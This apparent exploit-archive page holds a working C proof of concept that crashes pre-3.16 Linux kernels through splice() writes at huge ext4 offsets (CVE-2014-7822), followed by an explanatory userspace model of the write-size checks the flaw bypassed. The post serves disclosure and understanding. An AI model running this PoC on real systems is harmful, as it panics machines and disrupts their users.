Linux Kernel splice() System Call - Local DoS
Source: www.sevagas.com  Author: Nasi  Published: 2015-04-14
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 *
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file,
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call,
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem.
 *
 * This is a PoC that reproduces the vulnerability. No exploitation here, just a simple kernel panic.
 * Works on an ext4 filesystem.
 * Tested on Ubuntu with 3.13 and 3.14 kernels.
 *
 * Compile with: gcc -fno-stack-protector -Wall -o cve-2014-7822_poc cve-2014-7822_poc.c
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/
  
  
/* -----------------------   Includes ----------------------------*/
  
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <limits.h>
  
#define EXPLOIT_NAME "cve-2014-7822"
#define EXPLOIT_TYPE DOS
  
#define JUNK_SIZE 30000
  
/* -----------------------   functions ----------------------------*/
  
  
/* Useful: largest byte offsets accepted by write() and lseek() on ext4,
 * depending on the filesystem's extent feature and the per-file EXT4_EXTENTS_FL flag.
 *
 * +============+===============================+===============================+
 * | \ File flag|                               |                               |
 * |      \     |     !EXT4_EXTENTS_FL          |        EXT4_EXTENTS_FL        |
 * |Fs Features\|                               |                               |
 * +------------+-------------------------------+-------------------------------+
 * | !extent    |   write:      2194719883264   | write:       --------------   |
 * |            |   seek:       2199023251456   | seek:        --------------   |
 * +------------+-------------------------------+-------------------------------+
 * |  extent    |   write:      4402345721856   | write:       17592186044415   |
 * |            |   seek:      17592186044415   | seek:        17592186044415   |
 * +------------+-------------------------------+-------------------------------+
 */
  
  
/**
 * PoC for the cve_2014_7822 vulnerability
 */
int main(void)
{
    int pipefd[2];
    int result;
    int in_file;
    int out_file;
    int zulHandler;
    loff_t viciousOffset = 0;

    char junk[JUNK_SIZE] = {0};

    result = pipe(pipefd);
    if (result == -1)
    {
        printf("[cve_2014_7822 error]: pipe: %d - %s\n", errno, strerror(errno));
        exit(1);
    }

    // Create and clear zug.txt and zul.txt files
    system("cat /dev/null > zul.txt");
    system("cat /dev/null > zug.txt");

    // Fill zul.txt with 'A'
    zulHandler = open("zul.txt", O_RDWR);
    memset(junk, 'A', JUNK_SIZE);
    write(zulHandler, junk, JUNK_SIZE);
    close(zulHandler);

    // Put the content of zul.txt in the pipe
    viciousOffset = 0;
    in_file = open("zul.txt", O_RDONLY);
    result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE);
    close(in_file);

    // Put the content of the pipe in zug.txt at a huge offset, creating a ~108 TB sparse file.
    // The offset can be raised as far as the bogus 250 PB ext4 file size the kernel accepts here.
    out_file = open("zug.txt", O_RDWR);
    viciousOffset = 118402345721856;
    printf("[cve_2014_7822]: ViciousOffset = %lld\n", (long long)viciousOffset);

    result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE); // 8446744073709551615
    if (result == -1)
    {
        printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno));
        exit(1);
    }
    close(out_file);

    close(pipefd[0]);
    close(pipefd[1]);

    // Open zug.txt
    in_file = open("zug.txt", O_RDONLY);
    close(in_file);

    printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n");

    return 0;
}
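The header comment states the root cause: the pre-3.16 splice_write path wrote pipe data at whatever offset the caller supplied, without the file size checks that the ordinary write() path applies. The block below is an added userspace model of those checks (it is not kernel code and not part of the PoC), written after the shape of the kernel's generic_write_checks(): a write that starts at or beyond the filesystem's s_maxbytes, or at or beyond the process's RLIMIT_FSIZE, is rejected with EFBIG, and one that merely crosses the limit is shortened. The ext4 limit used as the s_maxbytes stand-in is the 17592186044415 value from the table above; the struct, function names and the RLIMIT sample value are assumptions for the example. Feeding the PoC's own offset (118402345721856) through the model shows why a checked path refuses the write that the vulnerable splice path performed. On a kernel that subjects splice writes to these same checks, the PoC's second splice() call is expected to fail with EFBIG instead of creating the sparse file (an assumption drawn from the description of the flaw, not something the page states).

```c
/* Userspace model of the size checks the ordinary write() path applies
 * and the pre-3.16 splice_write path skipped. Added example, modelled on
 * generic_write_checks(); not kernel code. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Limits the kernel takes from the superblock and the task. Constructed
 * for the example; the field names mirror their kernel counterparts. */
struct write_limits {
    int64_t  s_maxbytes;    /* filesystem maximum file size (sb->s_maxbytes) */
    uint64_t rlimit_fsize;  /* RLIMIT_FSIZE; RLIM_INF means RLIM_INFINITY */
};

#define RLIM_INF UINT64_MAX

/* Check a write of *count bytes starting at pos. Returns 0 (possibly
 * shortening *count) or a negative errno, like the kernel helper. */
int model_write_checks(const struct write_limits *lim, int64_t pos, uint64_t *count)
{
    if (pos < 0)
        return -EINVAL;

    /* Per-process limit: starting at or past it is EFBIG (the kernel also
     * sends SIGXFSZ); a write that crosses it is truncated to the limit. */
    if (lim->rlimit_fsize != RLIM_INF) {
        if ((uint64_t)pos >= lim->rlimit_fsize)
            return -EFBIG;
        if (*count > lim->rlimit_fsize - (uint64_t)pos)
            *count = lim->rlimit_fsize - (uint64_t)pos;
    }

    /* Filesystem limit: a non-empty write at or beyond s_maxbytes is EFBIG;
     * one that crosses it is shortened so the file never exceeds the limit. */
    if (pos >= lim->s_maxbytes) {
        if (*count || pos > lim->s_maxbytes)
            return -EFBIG;
    }
    if ((uint64_t)pos + *count > (uint64_t)lim->s_maxbytes)
        *count = (uint64_t)lim->s_maxbytes - (uint64_t)pos;

    return 0;
}

/* Values taken from this page: the PoC's splice offset, its buffer size,
 * and the ext4 extent-file limit from the table in the PoC header. */
#define POC_OFFSET   118402345721856LL
#define EXT4_EXT_MAX 17592186044415LL
#define POC_COUNT    30000ULL

/* The PoC's write as the checked path would see it: rejected with EFBIG. */
int check_poc_offset(void)
{
    struct write_limits lim = { EXT4_EXT_MAX, RLIM_INF };
    uint64_t count = POC_COUNT;
    return model_write_checks(&lim, POC_OFFSET, &count);
}

/* A write that straddles s_maxbytes is shortened, not rejected;
 * returns the shortened count (1000 bytes here). */
uint64_t check_straddling_write(void)
{
    struct write_limits lim = { EXT4_EXT_MAX, RLIM_INF };
    uint64_t count = POC_COUNT;
    int rc = model_write_checks(&lim, EXT4_EXT_MAX - 1000, &count);
    return rc == 0 ? count : 0;
}

/* RLIMIT_FSIZE is enforced before the filesystem limit: with a 1 MiB
 * limit (assumed sample value), a write starting at 1 MiB is EFBIG. */
int check_rlimit(void)
{
    struct write_limits lim = { EXT4_EXT_MAX, 1ULL << 20 };
    uint64_t count = POC_COUNT;
    return model_write_checks(&lim, 1LL << 20, &count);
}

int main(void)
{
    printf("PoC offset %lld vs ext4 limit %lld: %s\n",
           POC_OFFSET, EXT4_EXT_MAX, strerror(-check_poc_offset()));
    printf("write straddling the limit shortened to %llu bytes\n",
           (unsigned long long)check_straddling_write());
    printf("write at RLIMIT_FSIZE: %s\n", strerror(-check_rlimit()));
    return 0;
}
```

The useful takeaway for a practitioner is the order and shape of the checks: the per-process limit first, then the filesystem limit, with "at or beyond" meaning rejection and "crossing" meaning a short write. Any write path that bypasses this helper (as the splice_write implementations did) lets a caller place data past s_maxbytes, which is exactly what the PoC above exercises.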
